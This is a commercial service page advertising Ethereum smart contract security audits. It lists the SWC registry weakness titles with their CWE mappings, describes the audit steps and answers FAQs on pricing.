Home » Services » Ethereum-Smart-contract-Audit

Ethereum Services


Smart Contract Audit for Ethereum


The audit process for Ethereum smart contract is based on the comprehensive approach we follow to investigate the code for security flaws and potential vulnerabilities, and best possible ways to mitigate them.

Importance of Audit(security)

Smart contract hold assets of millions of worth, all the issues and security flaws must be solved before deploying on mainnet.

Secure code has high chances of project success.

Your code should justify your use-case.

If your smart contract Verified by 3rd party Auditor, it gains value in the market as well as attract investor.

Our Ethereum Audit Services

service

Blockchain / Platform Audit

It is generally of the combined nature (smart contract + backend with wallets). We identify and research on best optimisations possible with the smart contract that may save the precious gas of Ethereum. We focus to make the platform more efficient and secure overall.

service

Smart Contracts Audit

A Smart contract audit is a process to test the source code against all known vulnerabilities and attacks. A Smart Contract audit identifies and prevents the deployment of security vulnerabilities that may cause to loss. Both business case logic and security point of view are considered.

How We Process

quillaudits process quillaudits process

Our Ethereum Audit Items

ID Title Relationships Test cases
SWC-136

Unencrypted Private Data On-Chain

CWE-767: Access to Critical Private Variable via Public Method

SWC-135

Code With No Effects

CWE-1164: Irrelevant Code

SWC-134

Message call with hardcoded gas amount

CWE-655: Improper Initialization

SWC-133

Hash Collisions With Multiple Variable Length Arguments

CWE-294: Authentication Bypass by Capture-replay

SWC-132

Unexpected Ether balance

CWE-667: Improper Locking

SWC-131

Presence of unused variables

CWE-1164: Irrelevant Code

SWC-130

Right-To-Left-Override control character (U+202E)

CWE-451: User Interface (UI) Misrepresentation of Critical Information

SWC-129

Typographical Error

CWE-480: Use of Incorrect Operator

SWC-128

DoS With Block Gas Limit

CWE-400: Uncontrolled Resource Consumption

SWC-127

Arbitrary Jump with Function Type Variable

CWE-695: Use of Low-Level Functionality

SWC-126

Insufficient Gas Griefing

CWE-691: Insufficient Control Flow Management

SWC-125

Incorrect Inheritance Order

CWE-696: Incorrect Behavior Order

SWC-124

Write to Arbitrary Storage Location

CWE-123: Write-what-where Condition

SWC-123

Requirement Violation

CWE-573: Improper Following of Specification by Caller

SWC-122

Lack of Proper Signature Verification

CWE-345: Insufficient Verification of Data Authenticity

    SWC-121

    Missing Protection against Signature Replay Attacks

    CWE-347: Improper Verification of Cryptographic Signature

      SWC-120

      Weak Sources of Randomness from Chain Attributes

      CWE-330: Use of Insufficiently Random Values

      SWC-119

      Shadowing State Variables

      CWE-710: Improper Adherence to Coding Standards

      SWC-118

      Incorrect Constructor Name

      CWE-665: Improper Initialization

      SWC-117

      Signature Malleability

      CWE-347: Improper Verification of Cryptographic Signature

      SWC-116

      Block values as a proxy for time

      CWE-829: Inclusion of Functionality from Untrusted Control Sphere

      SWC-115

      Authorization through tx.origin

      CWE-477: Use of Obsolete Function

      SWC-114

      Transaction Order Dependence

      CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

      SWC-113

      DoS with Failed Call

      CWE-703: Improper Check or Handling of Exceptional Conditions

      SWC-112

      Delegatecall to Untrusted Callee

      CWE-829: Inclusion of Functionality from Untrusted Control Sphere

      SWC-111

      Use of Deprecated Solidity Functions

      CWE-477: Use of Obsolete Function

      SWC-110

      Assert Violation

      CWE-670: Always-Incorrect Control Flow Implementation

      SWC-109

      Uninitialized Storage Pointer

      CWE-824: Access of Uninitialized Pointer

      SWC-108

      State Variable Default Visibility

      CWE-710: Improper Adherence to Coding Standards

      SWC-107

      Reentrancy

      CWE-841: Improper Enforcement of Behavioral Workflow

      SWC-106

      Unprotected SELFDESTRUCT Instruction

      CWE-284: Improper Access Control

      SWC-105

      Unprotected Ether Withdrawal

      CWE-284: Improper Access Control

      SWC-104

      Unchecked Call Return Value

      CWE-252: Unchecked Return Value

      SWC-103

      Floating Pragma

      CWE-664: Improper Control of a Resource Through its Lifetime

      SWC-102

      Outdated Compiler Version

      CWE-937: Using Components with Known Vulnerabilities

      SWC-101

      Integer Overflow and Underflow

      CWE-682: Incorrect Calculation

      SWC-100

      Function Default Visibility

      CWE-710: Improper Adherence to Coding Standards

      Frequently Asked Questions

      What is Ethereum Smart Contract Audit?
      It is the process to scrutinize the smart contract code based on the Ethereum blockchain. It is a thorough analysis of the code against vulnerabilities and loopholes to ensure there are no errors in the source code.
      How do you audit Ethereum smart contracts?
      Our Ethereum smart contract audit process begins with the code specification gathering, where we get to know the behaviour of the smart contract. After this, there is unit testing followed by static analysis and formal code verification to identify coding flaws. Then the manual analysis and initial report are submitted with all the vulnerabilities and issues to be fixed.
      What are the key benefits of passing an Ethereum contract audit?
      The major benefit of an Ethereum smart contract audit is that the chances of your project getting hacked by an attacker are nullified. As the root cause behind any smart contract exploit is the vulnerabilities in the code, with audits, those vulnerabilities and loopholes are mitigated as the code is tested against severe critical conditions. Audits help projects build trust and authority before users, partners, and investors.
      How much does it cost to audit an Ethereum smart contract?
      On average, the cost lies between $1500 to $15k. However, it depends on the lines of code and the code complexity of the Ethereum smart contract. The above is a broad range; the cost varies based on the project size.
      What issues can be identified during the Ethereum contract audit?
      We scrutinize the Ethereum contract code against vulnerabilities which were behind recent exploits. We thoroughly examine the code against all the vulnerabilities in the SWC registry. Some common loopholes we check are; Reentrancy, Integer Overflow and Underflow, Unprotected Ether Withdrawal, Floating Pragma, and others.

      Trusted by 600+ web3 Products

      Secure Your Projects on Ethereum Blockchain with QuillAudits Smart Contract Auditing Services

      Request an Audit